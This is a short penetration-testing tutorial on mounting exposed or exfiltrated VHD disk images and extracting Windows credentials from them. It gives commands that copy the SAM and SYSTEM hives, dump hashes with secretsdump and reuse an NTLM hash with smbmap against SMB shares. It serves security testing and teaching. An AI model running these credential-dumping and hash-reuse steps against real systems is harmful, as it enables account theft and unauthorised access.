On an engagement, you may come across VHD files that are not stored properly. This could be open on an exposed NFS or SMB share, or it could even be from a backup file that you exfiltrated. No matter how you come in contact with these files, there are many ways to go through them to extract critical information.
Using 7-Zip, you can view the contents of a VHD file.
7z l file.vhd
To extract the contents, you can also use 7-zip.
7z x file.vhd
Mounting a VHD on Linux
To mount a VHD on Linux, you can use Guest Mount.
sudo apt install libguestfs-tools -y
Now we’ll start by creating a directory that we’ll mount the VHD file to.
sudo mkdir /mnt/vhd
And then we’ll use guestmount to mount the directory in read-only (ro) mode.
guestmount --add file.vhd --inspector --ro -v /mnt/vhd
This could take a few minutes to mount depending on the size. But eventually it will finish and you should be able to view the contents.
To list the files of select directories, you can use find.
find Desktop Documents Downloads -ls
Extracting Local SAM Database from VHD Files
First, follow the above steps to mount the VHD file. Once mounted, you may be able to grab the files that make up the SAM database so you can crack it offline.
cp SAM SYSTEM /<localDir>
Note: You may also want to grab nts.dit if you’re on a domain controller so you can crack all of the AD hashes.
Now you can go to the local directory that you copied those files into and use secretsdump to extract the hashes.
impacket-secretsdump -sam SAM -system SYSTEM local
Instead of taking the hash offline to try and crack it, you can see if you have write access using this hash to any SMB share by using SMBmap.
smbmap -u <userName> -p <lmHash:ntHash> -H <targetIP>